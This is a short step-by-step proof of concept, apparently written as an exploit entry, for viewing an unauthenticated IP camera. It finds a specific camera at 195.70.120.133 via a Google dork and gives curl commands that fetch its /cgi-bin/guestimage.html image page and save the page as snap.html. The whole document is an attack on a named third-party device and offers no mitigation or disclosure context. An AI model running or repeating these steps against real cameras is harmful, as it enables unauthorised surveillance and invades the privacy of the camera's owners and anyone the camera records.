# Step 1: Search via Google Dork
# Result: http://195.70.120.133/
# Step 2: Visit the IP in a browser
# The camera interface loads directly without requiring any authentication.
# Step 3: Capture the camera interface content using cURL
curl http://195.70.120.133/cgi-bin/guestimage.html
# Optional: Save the raw HTML content to a file
curl http://195.70.120.133/cgi-bin/guestimage.html --output snap.html